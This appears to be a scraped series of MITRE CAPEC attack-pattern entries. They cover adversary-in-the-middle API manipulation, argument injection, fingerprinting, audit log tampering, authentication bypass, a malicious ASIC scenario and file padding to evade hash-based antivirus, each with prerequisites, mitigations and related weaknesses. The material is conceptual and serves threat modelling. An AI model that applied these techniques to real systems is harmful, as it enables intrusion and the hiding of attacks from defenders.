ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	386	Application API Navigation Remapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Targeted software is utilizing application framework APIs

Resources Required

A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy.

Example Instances

An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:

[Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]

By altering the destination of "Claim_Link" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking "Yes" or "No" causes the user to load the attackers' code.

Related Weaknesses

CWE-ID	Weakness Name
471	Modification of Assumed-Immutable Data (MAID)
345	Insufficient Verification of Data Authenticity
346	Origin Validation Error
602	Client-Side Enforcement of Server-Side Security
311	Missing Encryption of Sensitive Data

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, Examples-Instances
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-384: Application API Message Manipulation via Man-in-the-Middle

Attack Pattern ID: 384

Abstraction: Standard

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	385	Transaction or Event Tampering via Application API Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	389	Content Spoofing Via Application API Manipulation
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	196	Session Credential Falsification through Forging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Targeted software is utilizing application framework APIs

Resources Required

A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.

Related Weaknesses

CWE-ID	Weakness Name
471	Modification of Assumed-Immutable Data (MAID)
345	Insufficient Verification of Data Authenticity
346	Origin Validation Error
602	Client-Side Enforcement of Server-Side Security
311	Missing Encryption of Sensitive Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Description

CAPEC-386: Application API Navigation Remapping

Attack Pattern ID: 386

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	387	Navigation Remapping To Propagate Malicious Content
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	388	Application API Button Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Targeted software is utilizing application framework APIs

Resources Required

A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a man-in-the-middle proxy.

Related Weaknesses

CWE-ID	Weakness Name
471	Modification of Assumed-Immutable Data (MAID)
345	Insufficient Verification of Data Authenticity
346	Origin Validation Error
602	Client-Side Enforcement of Server-Side Security
311	Missing Encryption of Sensitive Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Resources_Required

CAPEC-541: Application Fingerprinting

Attack Pattern ID: 541

Abstraction: Standard

View customized information:

Description

An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	224	Fingerprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	170	Web Application Fingerprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	310	Scanning for Vulnerable Software
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	472	Browser Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

None

Related Weaknesses

CWE-ID	Weakness Name
204	Observable Response Discrepancy
205	Observable Behavioral Discrepancy
208	Observable Timing Discrepancy

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1592.002	Gather Victim Host Information: Software

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-6: Argument Injection

Attack Pattern ID: 6

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Discovery of potential injection vectors: Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).

Techniques
Manually cover the application and record the possible places where arguments could be passed into external systems.
Use a spider, for web applications, to create a list of URLs and associated inputs.

Experiment

1. Attempt variations on argument content: Possibly using an automated tool, the attacker will perform injection variations of the arguments.

Techniques
Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).
Use a proxy tool to record results, error messages and/or log if accessible.

Exploit

Abuse of the application: The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.
Techniques
Manually inject specific payload into targeted argument.

Prerequisites

Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.

Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client.

Skills Required

[Level: Medium]

The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output.

Resources Required

Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data
Confidentiality	Read Data

Mitigations

Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.

Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.

Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.

Example Instances

A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]

Related Weaknesses

CWE-ID	Weakness Name
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
146	Improper Neutralization of Expression/Command Delimiters
184	Incomplete List of Disallowed Inputs
78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
185	Incorrect Regular Expression
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-482] Jouko Pynnonen. "Java Web Start argument injection vulnerability". <http://www.securityfocus.com/archive/1/393696>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-572: Artificially Inflate File Sizes

Attack Pattern ID: 572

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	655	Avoid Security Tool Identification by Adding Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Integrity	Modify Data

Example Instances

An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1027.001	Obfuscated Files or Information:Binary Padding

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Consequences, Description, Example_Instances, Likelihood_Of_Attack, Taxonomy_Mappings, Typical_Severity
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns

CAPEC-539: ASIC With Malicious Functionality

Attack Pattern ID: 539

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.

Advanced knowledge about the ASIC installed within the target system.

Skills Required

[Level: High]

Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes.

Example Instances

A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location.

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-268: Audit Log Manipulation

Attack Pattern ID: 268

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	81	Web Server Logs Tampering
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	93	Log Injection-Tampering-Forging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The target host is logging the action and data of the user.

The target host insufficiently protects access to the logs or logging mechanisms.

Resources Required

The attacker must understand how the logging mechanism works.

Optionally, the attacker must know the location and the format of individual entries of the log files.

Related Weaknesses

CWE-ID	Weakness Name
117	Improper Output Neutralization for Logs

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1070	Indicator Removal on Host
1562.002	Impair Defenses: Disable Windows Event Logging
1562.003	Impair Defenses: Impair Command History Logging
1562.008	Impair Defenses: Disable Cloud Logs

Relevant to the OWASP taxonomy mapping

Entry Name
Log Injection

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-114: Authentication Abuse

Attack Pattern ID: 114

Abstraction: Meta

View customized information:

Description

Extended Description

This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	90	Reflection Attack in Authentication Protocol

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Prerequisites

An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way.

Resources Required

A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism.

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication
1244	Internal Asset Exposed to Unsafe Debug Access Level or State

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1548	Abuse Elevation Control Mechanism

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-115: Authentication Bypass

Attack Pattern ID: 115

Abstraction: Meta

View customized information:

Description

Extended Description

This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	87	Forceful Browsing
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	461	Web Services API Signature Forgery Leveraging Hash Function Extension Weakness
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	480	Escaping Virtualization
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	664	Server Side Request Forgery
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	668	Key Negotiation of Bluetooth Attack (KNOB)
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc.

Resources Required

A client application, such as a web browser, or a scripting language capable of interacting with the target.

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1548	Abuse Elevation Control Mechanism

References

[REF-598] "OWASP Web Security Testing Guide". Testing for Bypassing Authentication Schema. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-655: Avoid Security Tool Identification by Adding Data

Attack Pattern ID: 655

Abstraction: Detailed

View customized information:

Description

An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.

In addition to this, adding data to a file also changes the file's hash, frustrating security tools that look for known bad files by their hash.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	572	Artificially Inflate File Sizes

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Consequences

Scope	Impact	Likelihood
Accountability	Hide Activities Bypass Protection Mechanism
Integrity	Modify Data

Example Instances

Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1027.001	Obfuscated Files or Information:Binary padding

